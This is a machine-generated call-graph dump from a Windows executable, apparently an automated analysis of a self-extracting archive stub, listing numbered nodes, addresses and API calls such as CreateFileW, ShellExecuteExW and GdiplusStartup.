GetLastError 23620->23623 23621->23614 23622->23621 23624 bfada1 FreeLibrary 23622->23624 23623->23622 23625 bfad7d LoadLibraryExW 23623->23625 23624->23621 23625->23622 23626->23609 23627->23561 23727 beec50 23628->23727 23631 be0888 GetProcAddress 23633 be08b9 GetProcAddress 23631->23633 23634 be08a1 23631->23634 23632 be08e7 23635 be0c14 GetModuleFileNameW 23632->23635 23738 bf75fb 42 API calls 2 library calls 23632->23738 23637 be08cb 23633->23637 23634->23633 23650 be0c32 23635->23650 23637->23632 23638 be0b54 23638->23635 23639 be0b5f GetModuleFileNameW CreateFileW 23638->23639 23640 be0b8f SetFilePointer 23639->23640 23641 be0c08 CloseHandle 23639->23641 23640->23641 23642 be0b9d ReadFile 23640->23642 23641->23635 23642->23641 23645 be0bbb 23642->23645 23645->23641 23647 be081b 2 API calls 23645->23647 23646 be0c94 GetFileAttributesW 23649 be0cac 23646->23649 23646->23650 23647->23645 23648 be0c5d CompareStringW 23648->23650 23651 be0cb7 23649->23651 23654 be0cec 23649->23654 23650->23646 23650->23648 23650->23649 23729 bdb146 23650->23729 23732 be081b 23650->23732 23653 be0cd0 GetFileAttributesW 23651->23653 23655 be0ce8 23651->23655 23652 be0dfb 23676 bea64d GetCurrentDirectoryW 23652->23676 23653->23651 23653->23655 23654->23652 23656 bdb146 GetVersionExW 23654->23656 23655->23654 23657 be0d06 23656->23657 23658 be0d0d 23657->23658 23659 be0d73 23657->23659 23661 be081b 2 API calls 23658->23661 23660 bd4092 _swprintf 51 API calls 23659->23660 23662 be0d9b AllocConsole 23660->23662 23663 be0d17 23661->23663 23665 be0da8 GetCurrentProcessId AttachConsole 23662->23665 23666 be0df3 ExitProcess 23662->23666 23664 be081b 2 API calls 23663->23664 23667 be0d21 23664->23667 23743 bf3e13 23665->23743 23739 bde617 23667->23739 23670 be0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23670->23666 23672 bd4092 _swprintf 51 API calls 23673 be0d4f 23672->23673 23674 bde617 53 API calls 23673->23674 23675 be0d5e 23674->23675 23675->23666 23676->23431 23678 be081b 2 API calls 23677->23678 23679 beac2a OleInitialize 23678->23679 23680 beac4d GdiplusStartup SHGetMalloc 23679->23680 23680->23433 23684 bec5ce 23681->23684 23682 bec6e4 23682->23441 23682->23442 23683 be1fac CharUpperW 23683->23684 23684->23682 23684->23683 23768 bdf3fa 82 API calls 2 library calls 23684->23768 23687 beec50 23686->23687 23688 bedbeb SetEnvironmentVariableW 23687->23688 23689 bedc0e 23688->23689 23690 bedc36 23689->23690 23691 bedc2a SetEnvironmentVariableW 23689->23691 23690->23436 23691->23690 23769 bd4065 23692->23769 23695 beb6dd LoadBitmapW 23696 beb6fe 23695->23696 23697 beb70b GetObjectW 23695->23697 23837 bea6c2 FindResourceW 23696->23837 23699 beb71a 23697->23699 23832 bea5c6 23699->23832 23703 beb770 23714 bdda42 23703->23714 23704 beb74c 23853 bea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23704->23853 23706 bea6c2 13 API calls 23708 beb73d 23706->23708 23707 beb754 23854 bea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23707->23854 23708->23704 23710 beb743 DeleteObject 23708->23710 23710->23704 23711 beb75d 23855 bea80c 8 API calls 23711->23855 23713 beb764 DeleteObject 23713->23703 23866 bdda67 23714->23866 23719 be90b7 23999 beeb38 23719->23999 23723 beacab GdiplusShutdown CoUninitialize 23722->23723 23723->23471 23725->23462 23726->23470 23728 be086d GetModuleHandleW 23727->23728 23728->23631 23728->23632 23730 bdb15a GetVersionExW 23729->23730 23731 bdb196 23729->23731 23730->23731 23731->23650 23733 beec50 23732->23733 23734 be0828 GetSystemDirectoryW 23733->23734 23735 be085e 23734->23735 23736 be0840 23734->23736 23735->23650 23737 be0851 LoadLibraryW 23736->23737 23737->23735 23738->23638 23740 bde627 23739->23740 23745 bde648 23740->23745 23744 bf3e1b 23743->23744 23744->23670 23744->23744 23751 bdd9b0 23745->23751 23748 bde66b LoadStringW 23749 bde645 23748->23749 23750 bde682 LoadStringW 23748->23750 23749->23672 23750->23749 23756 bdd8ec 23751->23756 23753 bdd9cd 23754 bdd9e2 23753->23754 23764 bdd9f0 26 API calls 23753->23764 23754->23748 23754->23749 23757 bdd904 23756->23757 23758 bdd984 _strncpy 23756->23758 23760 bdd928 23757->23760 23765 be1da7 WideCharToMultiByte 23757->23765 23758->23753 23763 bdd959 23760->23763 23766 bde5b1 50 API calls __vsnprintf 23760->23766 23767 bf6159 26 API calls 3 library calls 23763->23767 23764->23754 23765->23760 23766->23763 23767->23758 23768->23684 23770 bd407c __vswprintf_c_l 23769->23770 23773 bf5fd4 23770->23773 23776 bf4097 23773->23776 23777 bf40bf 23776->23777 23778 bf40d7 23776->23778 23793 bf91a8 20 API calls _abort 23777->23793 23778->23777 23780 bf40df 23778->23780 23795 bf4636 23780->23795 23781 bf40c4 23794 bf9087 26 API calls _abort 23781->23794 23786 befbbc _ValidateLocalCookies 5 API calls 23788 bd4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23786->23788 23787 bf4167 23804 bf49e6 51 API calls 4 library calls 23787->23804 23788->23695 23791 bf40cf 23791->23786 23792 bf4172 23805 bf46b9 20 API calls _free 23792->23805 23793->23781 23794->23791 23796 bf40ef 23795->23796 23797 bf4653 23795->23797 23803 bf4601 20 API calls 2 library calls 23796->23803 23797->23796 23806 bf97e5 GetLastError 23797->23806 23799 bf4674 23826 bf993a 38 API calls __cftof 23799->23826 23801 bf468d 23827 bf9967 38 API calls __cftof 23801->23827 23803->23787 23804->23792 23805->23791 23807 bf97fb 23806->23807 23808 bf9801 23806->23808 23828 bfae5b 11 API calls 2 library calls 23807->23828 23809 bfb136 _abort 20 API calls 23808->23809 23811 bf9850 SetLastError 23808->23811 23813 bf9813 23809->23813 23811->23799 23812 bf981b 23815 bf8dcc _free 20 API calls 23812->23815 23813->23812 23829 bfaeb1 11 API calls 2 library calls 23813->23829 23817 bf9821 23815->23817 23816 bf9830 23816->23812 23818 bf9837 23816->23818 23819 bf985c SetLastError 23817->23819 23830 bf9649 20 API calls _abort 23818->23830 23831 bf8d24 38 API calls _abort 23819->23831 23822 bf9842 23824 bf8dcc _free 20 API calls 23822->23824 23825 bf9849 23824->23825 23825->23811 23825->23819 23826->23801 23827->23796 23828->23808 23829->23816 23830->23822 23856 bea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23832->23856 23834 bea5cd 23835 bea5d9 23834->23835 23857 bea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23834->23857 23835->23703 23835->23704 23835->23706 23838 bea7d3 23837->23838 23839 bea6e5 SizeofResource 23837->23839 23838->23697 23838->23699 23839->23838 23840 bea6fc LoadResource 23839->23840 23840->23838 23841 bea711 LockResource 23840->23841 23841->23838 23842 bea722 GlobalAlloc 23841->23842 23842->23838 23843 bea73d GlobalLock 23842->23843 23844 bea7cc GlobalFree 23843->23844 23845 bea74c __InternalCxxFrameHandler 23843->23845 23844->23838 23846 bea754 CreateStreamOnHGlobal 23845->23846 23847 bea76c 23846->23847 23848 bea7c5 GlobalUnlock 23846->23848 23858 bea626 GdipAlloc 23847->23858 23848->23844 23851 bea79a GdipCreateHBITMAPFromBitmap 23852 bea7b0 23851->23852 23852->23848 23853->23707 23854->23711 23855->23713 23856->23834 23857->23835 23859 bea638 23858->23859 23860 bea645 23858->23860 23862 bea3b9 23859->23862 23860->23848 23860->23851 23860->23852 23863 bea3da GdipCreateBitmapFromStreamICM 23862->23863 23864 bea3e1 GdipCreateBitmapFromStream 23862->23864 23865 bea3e6 23863->23865 23864->23865 23865->23860 23867 bdda75 __EH_prolog 23866->23867 23868 bddaa4 GetModuleFileNameW 23867->23868 23869 bddad5 23867->23869 23870 bddabe 23868->23870 23912 bd98e0 23869->23912 23870->23869 23872 bddb31 23923 bf6310 23872->23923 23874 bde261 78 API calls 23877 bddb05 23874->23877 23877->23872 23877->23874 23903 bddd4a 23877->23903 23878 bddb44 23879 bf6310 26 API calls 23878->23879 23882 bddb56 ___vcrt_FlsFree 23879->23882 23887 bddc85 23882->23887 23882->23903 23937 bd9e80 23882->23937 23953 bd9bd0 23882->23953 23958 bd9d70 81 API calls 23882->23958 23884 bddc9f ___std_exception_copy 23885 bd9bd0 82 API calls 23884->23885 23884->23903 23888 bddcc8 ___std_exception_copy 23885->23888 23887->23903 23959 bd9d70 81 API calls 23887->23959 23888->23903 23907 bddcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 23888->23907 23960 be1b84 MultiByteToWideChar 23888->23960 23890 bde159 23895 bde1de 23890->23895 23966 bf8cce 26 API calls 2 library calls 23890->23966 23893 bde16e 23967 bf7625 26 API calls 2 library calls 23893->23967 23894 bde1c6 23968 bde27c 78 API calls 23894->23968 23896 bde214 23895->23896 23899 bde261 78 API calls 23895->23899 23900 bf6310 26 API calls 23896->23900 23899->23895 23901 bde22d 23900->23901 23902 bf6310 26 API calls 23901->23902 23902->23903 23946 bd959a 23903->23946 23906 be1da7 WideCharToMultiByte 23906->23907 23907->23890 23907->23903 23907->23906 23961 bde5b1 50 API calls __vsnprintf 23907->23961 23962 bf6159 26 API calls 3 library calls 23907->23962 23963 bf8cce 26 API calls 2 library calls 23907->23963 23964 bf7625 26 API calls 2 library calls 23907->23964 23965 bde27c 78 API calls 23907->23965 23910 bde29e GetModuleHandleW FindResourceW 23911 bdda55 23910->23911 23911->23719 23914 bd98ea 23912->23914 23913 bd994b CreateFileW 23915 bd996c GetLastError 23913->23915 23919 bd99bb 23913->23919 23914->23913 23969 bdbb03 23915->23969 23917 bd998c 23918 bd9990 CreateFileW GetLastError 23917->23918 23917->23919 23918->23919 23921 bd99b5 23918->23921 23920 bd99ff 23919->23920 23922 bd99e5 SetFileTime 23919->23922 23920->23877 23921->23919 23922->23920 23924 bf6349 23923->23924 23925 bf634d 23924->23925 23936 bf6375 23924->23936 23973 bf91a8 20 API calls _abort 23925->23973 23927 bf6699 23929 befbbc _ValidateLocalCookies 5 API calls 23927->23929 23928 bf6352 23974 bf9087 26 API calls _abort 23928->23974 23931 bf66a6 23929->23931 23931->23878 23932 bf635d 23933 befbbc _ValidateLocalCookies 5 API calls 23932->23933 23934 bf6369 23933->23934 23934->23878 23936->23927 23975 bf6230 5 API calls _ValidateLocalCookies 23936->23975 23938 bd9e92 23937->23938 23943 bd9ea5 23937->23943 23939 bd9eb0 23938->23939 23976 bd6d5b 77 API calls 23938->23976 23939->23882 23940 bd9eb8 SetFilePointer 23940->23939 23942 bd9ed4 GetLastError 23940->23942 23942->23939 23944 bd9ede 23942->23944 23943->23939 23943->23940 23944->23939 23977 bd6d5b 77 API calls 23944->23977 23947 bd95be 23946->23947 23948 bd95cf 23946->23948 23947->23948 23949 bd95ca 23947->23949 23950 bd95d1 23947->23950 23948->23910 23978 bd974e 23949->23978 23983 bd9620 23950->23983 23954 bd9bdc 23953->23954 23956 bd9be3 23953->23956 23954->23882 23956->23954 23957 bd9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 23956->23957 23998 bd6d1a 77 API calls 23956->23998 23957->23956 23958->23882 23959->23884 23960->23907 23961->23907 23962->23907 23963->23907 23964->23907 23965->23907 23966->23893 23967->23894 23968->23895 23970 bdbb10 _wcslen 23969->23970 23971 bdbbb8 GetCurrentDirectoryW 23970->23971 23972 bdbb39 _wcslen 23970->23972 23971->23972 23972->23917 23973->23928 23974->23932 23975->23936 23976->23943 23977->23939 23979 bd9757 23978->23979 23980 bd9781 23978->23980 23979->23980 23989 bda1e0 23979->23989 23980->23948 23984 bd962c 23983->23984 23985 bd964a 23983->23985 23984->23985 23987 bd9638 CloseHandle 23984->23987 23986 bd9669 23985->23986 23997 bd6bd5 76 API calls 23985->23997 23986->23948 23987->23985 23990 beec50 23989->23990 23991 bda1ed DeleteFileW 23990->23991 23992 bd977f 23991->23992 23993 bda200 23991->23993 23992->23948 23994 bdbb03 GetCurrentDirectoryW 23993->23994 23995 bda214 23994->23995 23995->23992 23996 bda218 DeleteFileW 23995->23996 23996->23992 23997->23986 23998->23956 24000 beeb3d ___std_exception_copy 23999->24000 24001 be90d6 24000->24001 24003 beeb59 24000->24003 24008 bf7a5e 7 API calls 2 library calls 24000->24008 24001->23455 24007 bef5c9 24003->24007 24009 bf238d RaiseException 24003->24009 24006 bef5e6 24010 bf238d RaiseException 24007->24010 24008->24000 24009->24007 24010->24006 24012 bf7ce1 _abort 24011->24012 24013 bf7cfa 24012->24013 24014 bf7ce8 24012->24014 24035 bfac31 EnterCriticalSection 24013->24035 24047 bf7e2f GetModuleHandleW 24014->24047 24017 bf7ced 24017->24013 24048 bf7e73 GetModuleHandleExW 24017->24048 24018 bf7d9f 24036 bf7ddf 24018->24036 24023 bf7d76 24024 bf7d8e 24023->24024 24030 bf8a91 _abort 5 API calls 24023->24030 24031 bf8a91 _abort 5 API calls 24024->24031 24025 bf7d01 24025->24018 24025->24023 24056 bf87e0 20 API calls _abort 24025->24056 24026 bf7dbc 24039 bf7dee 24026->24039 24027 bf7de8 24057 c02390 5 API calls _ValidateLocalCookies 24027->24057 24030->24024 24031->24018 24035->24025 24058 bfac81 LeaveCriticalSection 24036->24058 24038 bf7db8 24038->24026 24038->24027 24059 bfb076 24039->24059 24042 bf7e1c 24045 bf7e73 _abort 8 API calls 24042->24045 24043 bf7dfc GetPEB 24043->24042 24044 bf7e0c GetCurrentProcess TerminateProcess 24043->24044 24044->24042 24046 bf7e24 ExitProcess 24045->24046 24047->24017 24049 bf7e9d GetProcAddress 24048->24049 24050 bf7ec0 24048->24050 24054 bf7eb2 24049->24054 24051 bf7ecf 24050->24051 24052 bf7ec6 FreeLibrary 24050->24052 24053 befbbc _ValidateLocalCookies 5 API calls 24051->24053 24052->24051 24055 bf7cf9 24053->24055 24054->24050 24055->24013 24056->24023 24058->24038 24060 bfb09b 24059->24060 24061 bfb091 24059->24061 24062 bfac98 _abort 5 API calls 24060->24062 24063 befbbc _ValidateLocalCookies 5 API calls 24061->24063 24062->24061 24064 bf7df8 24063->24064 24064->24042 24064->24043 25351 beb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24065 bee5b1 24066 bee578 24065->24066 24066->24065 24068 bee85d 24066->24068 24094 bee5bb 24068->24094 24070 bee86d 24071 bee8ee 24070->24071 24072 bee8ca 24070->24072 24075 bee966 LoadLibraryExA 24071->24075 24077 bee9c7 24071->24077 24081 bee9d9 24071->24081 24083 beea95 24071->24083 24073 bee7fb DloadReleaseSectionWriteAccess 6 API calls 24072->24073 24074 bee8d5 RaiseException 24073->24074 24089 beeac3 24074->24089 24076 bee979 GetLastError 24075->24076 24075->24077 24079 bee98c 24076->24079 24080 bee9a2 24076->24080 24078 bee9d2 FreeLibrary 24077->24078 24077->24081 24078->24081 24079->24077 24079->24080 24084 bee7fb DloadReleaseSectionWriteAccess 6 API calls 24080->24084 24082 beea37 GetProcAddress 24081->24082 24081->24083 24082->24083 24085 beea47 GetLastError 24082->24085 24103 bee7fb 24083->24103 24086 bee9ad RaiseException 24084->24086 24087 beea5a 24085->24087 24086->24089 24087->24083 24090 bee7fb DloadReleaseSectionWriteAccess 6 API calls 24087->24090 24089->24066 24091 beea7b RaiseException 24090->24091 24092 bee5bb ___delayLoadHelper2@8 6 API calls 24091->24092 24093 beea92 24092->24093 24093->24083 24095 bee5ed 24094->24095 24096 bee5c7 24094->24096 24095->24070 24111 bee664 24096->24111 24098 bee5cc 24099 bee5e8 24098->24099 24114 bee78d 24098->24114 24119 bee5ee GetModuleHandleW GetProcAddress GetProcAddress 24099->24119 24102 bee836 24102->24070 24104 bee82f 24103->24104 24105 bee80d 24103->24105 24104->24089 24106 bee664 DloadReleaseSectionWriteAccess 3 API calls 24105->24106 24107 bee812 24106->24107 24108 bee82a 24107->24108 24109 bee78d DloadProtectSection 3 API calls 24107->24109 24122 bee831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24108->24122 24109->24108 24120 bee5ee GetModuleHandleW GetProcAddress GetProcAddress 24111->24120 24113 bee669 24113->24098 24115 bee7a2 DloadProtectSection 24114->24115 24116 bee7dd VirtualProtect 24115->24116 24117 bee7a8 24115->24117 24121 bee6a3 VirtualQuery GetSystemInfo 24115->24121 24116->24117 24117->24099 24119->24102 24120->24113 24121->24116 24122->24104 25394 c02bd0 VariantClear 25395 bd6faa 111 API calls 3 library calls 25354 beeda7 48 API calls _unexpected 25396 bef3a0 27 API calls 25318 bfa4a0 71 API calls _free 25319 bedca1 DialogBoxParamW 25320 bfb49d 6 API calls _ValidateLocalCookies 25355 beb18d 78 API calls 25322 bec793 97 API calls 4 library calls 25377 bec793 102 API calls 4 library calls 25357 be9580 6 API calls 25324 bf2cfb 38 API calls 4 library calls 25358 bd95f0 80 API calls 25378 bd5ef0 82 API calls 24303 bf98f0 24311 bfadaf 24303->24311 24307 bf990c 24308 bf9919 24307->24308 24319 bf9920 11 API calls 24307->24319 24310 bf9904 24312 bfac98 _abort 5 API calls 24311->24312 24313 bfadd6 24312->24313 24314 bfadee TlsAlloc 24313->24314 24315 bfaddf 24313->24315 24314->24315 24316 befbbc _ValidateLocalCookies 5 API calls 24315->24316 24317 bf98fa 24316->24317 24317->24310 24318 bf9869 20 API calls 2 library calls 24317->24318 24318->24307 24319->24310 24320 bfabf0 24321 bfabfb 24320->24321 24322 bfaf0a 11 API calls 24321->24322 24323 bfac24 24321->24323 24325 bfac20 24321->24325 24322->24321 24326 bfac50 DeleteCriticalSection 24323->24326 24326->24325 25326 bf88f0 7 API calls ___scrt_uninitialize_crt 25360 befd4f 9 API calls 2 library calls 25361 bdf1e8 FreeLibrary 24333 beeae7 24334 beeaf1 24333->24334 24335 bee85d ___delayLoadHelper2@8 14 API calls 24334->24335 24336 beeafe 24335->24336 25327 bef4e7 29 API calls _abort 24338 bd13e1 84 API calls 2 library calls 24339 beb7e0 24340 beb7ea __EH_prolog 24339->24340 24507 bd1316 24340->24507 24343 beb841 24344 bebf0f 24572 bed69e 24344->24572 24345 beb82a 24345->24343 24347 beb89b 24345->24347 24348 beb838 24345->24348 24350 beb92e GetDlgItemTextW 24347->24350 24356 beb8b1 24347->24356 24351 beb83c 24348->24351 24352 beb878 24348->24352 24350->24352 24355 beb96b 24350->24355 24351->24343 24363 bde617 53 API calls 24351->24363 24352->24343 24360 beb95f KiUserCallbackDispatcher 24352->24360 24353 bebf2a SendMessageW 24354 bebf38 24353->24354 24357 bebf52 GetDlgItem SendMessageW 24354->24357 24358 bebf41 SendDlgItemMessageW 24354->24358 24361 beb980 GetDlgItem 24355->24361 24505 beb974 24355->24505 24362 bde617 53 API calls 24356->24362 24590 bea64d GetCurrentDirectoryW 24357->24590 24358->24357 24360->24343 24365 beb9b7 SetFocus 24361->24365 24366 beb994 SendMessageW SendMessageW 24361->24366 24367 beb8ce SetDlgItemTextW 24362->24367 24368 beb85b 24363->24368 24364 bebf82 GetDlgItem 24369 bebf9f 24364->24369 24370 bebfa5 SetWindowTextW 24364->24370 24371 beb9c7 24365->24371 24382 beb9e0 24365->24382 24366->24365 24372 beb8d9 24367->24372 24612 bd124f SHGetMalloc 24368->24612 24369->24370 24591 beabab GetClassNameW 24370->24591 24377 bde617 53 API calls 24371->24377 24372->24343 24380 beb8e6 GetMessageW 24372->24380 24374 beb862 24374->24343 24383 bec1fc SetDlgItemTextW 24374->24383 24375 bebe55 24378 bde617 53 API calls 24375->24378 24381 beb9d1 24377->24381 24384 bebe65 SetDlgItemTextW 24378->24384 24380->24343 24386 beb8fd IsDialogMessageW 24380->24386 24613 bed4d4 24381->24613 24391 bde617 53 API calls 24382->24391 24383->24343 24388 bebe79 24384->24388 24386->24372 24390 beb90c TranslateMessage DispatchMessageW 24386->24390 24393 bde617 53 API calls 24388->24393 24390->24372 24392 beba17 24391->24392 24395 bd4092 _swprintf 51 API calls 24392->24395 24422 bebe9c _wcslen 24393->24422 24394 bebff0 24398 bec020 24394->24398 24402 bde617 53 API calls 24394->24402 24401 beba29 24395->24401 24396 bec73f 97 API calls 24396->24394 24397 beb9d9 24517 bda0b1 24397->24517 24400 bec0d8 24398->24400 24404 bec73f 97 API calls 24398->24404 24405 bec18b 24400->24405 24440 bec169 24400->24440 24453 bde617 53 API calls 24400->24453 24406 bed4d4 16 API calls 24401->24406 24407 bec003 SetDlgItemTextW 24402->24407 24412 bec03b 24404->24412 24413 bec19d 24405->24413 24414 bec194 EnableWindow 24405->24414 24406->24397 24410 bde617 53 API calls 24407->24410 24408 beba73 24523 beac04 SetCurrentDirectoryW 24408->24523 24409 beba68 GetLastError 24409->24408 24415 bec017 SetDlgItemTextW 24410->24415 24419 bec04d 24412->24419 24449 bec072 24412->24449 24423 bec1ba 24413->24423 24631 bd12d3 GetDlgItem EnableWindow 24413->24631 24414->24413 24415->24398 24416 beba87 24418 beba90 GetLastError 24416->24418 24424 beba9e 24416->24424 24417 bde617 53 API calls 24417->24343 24418->24424 24629 be9ed5 32 API calls 24419->24629 24420 bec0cb 24425 bec73f 97 API calls 24420->24425 24430 bde617 53 API calls 24422->24430 24452 bebeed 24422->24452 24426 bec1e1 24423->24426 24435 bec1d9 SendMessageW 24423->24435 24427 bebb11 24424->24427 24432 bebb20 24424->24432 24437 bebaae GetTickCount 24424->24437 24425->24400 24426->24343 24436 bde617 53 API calls 24426->24436 24431 bebd56 24427->24431 24427->24432 24429 bec1b0 24632 bd12d3 GetDlgItem EnableWindow 24429->24632 24438 bebed0 24430->24438 24532 bd12f1 GetDlgItem ShowWindow 24431->24532 24439 bebcfb 24432->24439 24441 bebb39 GetModuleFileNameW 24432->24441 24442 bebcf1 24432->24442 24433 bec066 24433->24449 24435->24426 24436->24374 24444 bd4092 _swprintf 51 API calls 24437->24444 24445 bd4092 _swprintf 51 API calls 24438->24445 24448 bde617 53 API calls 24439->24448 24630 be9ed5 32 API calls 24440->24630 24623 bdf28c 82 API calls 24441->24623 24442->24352 24442->24439 24451 bebac7 24444->24451 24445->24452 24456 bebd05 24448->24456 24449->24420 24457 bec73f 97 API calls 24449->24457 24450 bebd66 24533 bd12f1 GetDlgItem ShowWindow 24450->24533 24524 bd966e 24451->24524 24452->24417 24453->24400 24454 bec188 24454->24405 24455 bebb5f 24459 bd4092 _swprintf 51 API calls 24455->24459 24460 bd4092 _swprintf 51 API calls 24456->24460 24461 bec0a0 24457->24461 24463 bebb81 CreateFileMappingW 24459->24463 24464 bebd23 24460->24464 24461->24420 24465 bec0a9 DialogBoxParamW 24461->24465 24462 bebd70 24466 bde617 53 API calls 24462->24466 24468 bebbe3 GetCommandLineW 24463->24468 24501 bebc60 __InternalCxxFrameHandler 24463->24501 24478 bde617 53 API calls 24464->24478 24465->24352 24465->24420 24469 bebd7a SetDlgItemTextW 24466->24469 24473 bebbf4 24468->24473 24534 bd12f1 GetDlgItem ShowWindow 24469->24534 24470 bebaed 24471 bebaf4 GetLastError 24470->24471 24472 bebaff 24470->24472 24471->24472 24476 bd959a 80 API calls 24472->24476 24624 beb425 SHGetMalloc 24473->24624 24474 bebc6b ShellExecuteExW 24496 bebc88 24474->24496 24476->24427 24481 bebd3d 24478->24481 24479 bebd8c SetDlgItemTextW GetDlgItem 24482 bebda9 GetWindowLongW SetWindowLongW 24479->24482 24483 bebdc1 24479->24483 24480 bebc10 24625 beb425 SHGetMalloc 24480->24625 24482->24483 24535 bec73f 24483->24535 24487 bebc1c 24626 beb425 SHGetMalloc 24487->24626 24488 bebccb 24488->24442 24494 bebce1 UnmapViewOfFile CloseHandle 24488->24494 24489 bec73f 97 API calls 24491 bebddd 24489->24491 24560 beda52 24491->24560 24492 bebc28 24627 bdf3fa 82 API calls 2 library calls 24492->24627 24494->24442 24496->24488 24499 bebcb7 Sleep 24496->24499 24498 bebc3f MapViewOfFile 24498->24501 24499->24488 24499->24496 24500 bec73f 97 API calls 24504 bebe03 24500->24504 24501->24474 24502 bebe2c 24628 bd12d3 GetDlgItem EnableWindow 24502->24628 24504->24502 24506 bec73f 97 API calls 24504->24506 24505->24352 24505->24375 24506->24502 24508 bd131f 24507->24508 24509 bd1378 24507->24509 24511 bd1385 24508->24511 24633 bde2e8 62 API calls 2 library calls 24508->24633 24634 bde2c1 GetWindowLongW SetWindowLongW 24509->24634 24511->24343 24511->24344 24511->24345 24513 bd1341 24513->24511 24514 bd1354 GetDlgItem 24513->24514 24514->24511 24515 bd1364 24514->24515 24515->24511 24516 bd136a SetWindowTextW 24515->24516 24516->24511 24520 bda0bb 24517->24520 24518 bda14c 24519 bda2b2 8 API calls 24518->24519 24521 bda175 24518->24521 24519->24521 24520->24518 24520->24521 24635 bda2b2 24520->24635 24521->24408 24521->24409 24523->24416 24525 bd9678 24524->24525 24526 bd96d5 CreateFileW 24525->24526 24528 bd96c9 24525->24528 24526->24528 24527 bd971f 24527->24470 24528->24527 24529 bdbb03 GetCurrentDirectoryW 24528->24529 24530 bd9704 24529->24530 24530->24527 24531 bd9708 CreateFileW 24530->24531 24531->24527 24532->24450 24533->24462 24534->24479 24536 bec749 __EH_prolog 24535->24536 24537 bebdcf 24536->24537 24667 beb314 24536->24667 24537->24489 24540 beb314 ExpandEnvironmentStringsW 24545 bec780 _wcslen _wcsrchr 24540->24545 24541 beca67 SetWindowTextW 24541->24545 24545->24537 24545->24540 24545->24541 24547 bec855 SetFileAttributesW 24545->24547 24552 becc31 GetDlgItem SetWindowTextW SendMessageW 24545->24552 24555 becc71 SendMessageW 24545->24555 24671 be1fbb CompareStringW 24545->24671 24672 bea64d GetCurrentDirectoryW 24545->24672 24674 bda5d1 6 API calls 24545->24674 24675 bda55a FindClose 24545->24675 24676 beb48e 76 API calls 2 library calls 24545->24676 24677 bf3e3e 24545->24677 24549 bec90f GetFileAttributesW 24547->24549 24559 bec86f _abort _wcslen 24547->24559 24549->24545 24551 bec921 DeleteFileW 24549->24551 24551->24545 24553 bec932 24551->24553 24552->24545 24554 bd4092 _swprintf 51 API calls 24553->24554 24556 bec952 GetFileAttributesW 24554->24556 24555->24545 24556->24553 24557 bec967 MoveFileW 24556->24557 24557->24545 24558 bec97f MoveFileExW 24557->24558 24558->24545 24559->24545 24559->24549 24673 bdb991 51 API calls 2 library calls 24559->24673 24561 beda5c __EH_prolog 24560->24561 24692 be0659 24561->24692 24563 beda8d 24696 bd5b3d 24563->24696 24565 bedaab 24700 bd7b0d 24565->24700 24569 bedafe 24716 bd7b9e 24569->24716 24571 bebdee 24571->24500 24573 bed6a8 24572->24573 24574 bea5c6 4 API calls 24573->24574 24575 bed6ad 24574->24575 24576 bebf15 24575->24576 24577 bed6b5 GetWindow 24575->24577 24576->24353 24576->24354 24577->24576 24578 bed6d5 24577->24578 24578->24576 24579 bed6e2 GetClassNameW 24578->24579 24581 bed76a GetWindow 24578->24581 24582 bed706 GetWindowLongW 24578->24582 25197 be1fbb CompareStringW 24579->25197 24581->24576 24581->24578 24582->24581 24583 bed716 SendMessageW 24582->24583 24583->24581 24584 bed72c GetObjectW 24583->24584 25198 bea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24584->25198 24586 bed743 25199 bea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24586->25199 25200 bea80c 8 API calls 24586->25200 24589 bed754 SendMessageW DeleteObject 24589->24581 24590->24364 24592 beabcc 24591->24592 24593 beabf1 24591->24593 25201 be1fbb CompareStringW 24592->25201 24594 beabff 24593->24594 24595 beabf6 SHAutoComplete 24593->24595 24599 beb093 24594->24599 24595->24594 24597 beabdf 24597->24593 24598 beabe3 FindWindowExW 24597->24598 24598->24593 24600 beb09d __EH_prolog 24599->24600 24601 bd13dc 84 API calls 24600->24601 24602 beb0bf 24601->24602 25202 bd1fdc 24602->25202 24605 beb0eb 24608 bd19af 128 API calls 24605->24608 24606 beb0d9 24607 bd1692 86 API calls 24606->24607 24609 beb0e4 24607->24609 24611 beb10d __InternalCxxFrameHandler ___std_exception_copy 24608->24611 24609->24394 24609->24396 24610 bd1692 86 API calls 24610->24609 24611->24610 24612->24374 25210 beb568 PeekMessageW 24613->25210 24616 bed536 SendMessageW SendMessageW 24618 bed572 24616->24618 24619 bed591 SendMessageW SendMessageW SendMessageW 24616->24619 24617 bed502 24620 bed50d ShowWindow SendMessageW SendMessageW 24617->24620 24618->24619 24621 bed5e7 SendMessageW 24619->24621 24622 bed5c4 SendMessageW 24619->24622 24620->24616 24621->24397 24622->24621 24623->24455 24624->24480 24625->24487 24626->24492 24627->24498 24628->24505 24629->24433 24630->24454 24631->24429 24632->24423 24633->24513 24634->24511 24636 bda2bf 24635->24636 24637 bda2e3 24636->24637 24638 bda2d6 CreateDirectoryW 24636->24638 24656 bda231 24637->24656 24638->24637 24640 bda316 24638->24640 24644 bda325 24640->24644 24648 bda4ed 24640->24648 24642 bda329 GetLastError 24642->24644 24644->24520 24645 bdbb03 GetCurrentDirectoryW 24646 bda2ff 24645->24646 24646->24642 24647 bda303 CreateDirectoryW 24646->24647 24647->24640 24647->24642 24649 beec50 24648->24649 24650 bda4fa SetFileAttributesW 24649->24650 24651 bda53d 24650->24651 24652 bda510 24650->24652 24651->24644 24653 bdbb03 GetCurrentDirectoryW 24652->24653 24654 bda524 24653->24654 24654->24651 24655 bda528 SetFileAttributesW 24654->24655 24655->24651 24659 bda243 24656->24659 24660 beec50 24659->24660 24661 bda250 GetFileAttributesW 24660->24661 24662 bda23a 24661->24662 24663 bda261 24661->24663 24662->24642 24662->24645 24664 bdbb03 GetCurrentDirectoryW 24663->24664 24665 bda275 24664->24665 24665->24662 24666 bda279 GetFileAttributesW 24665->24666 24666->24662 24668 beb31e 24667->24668 24669 beb3f0 ExpandEnvironmentStringsW 24668->24669 24670 beb40d 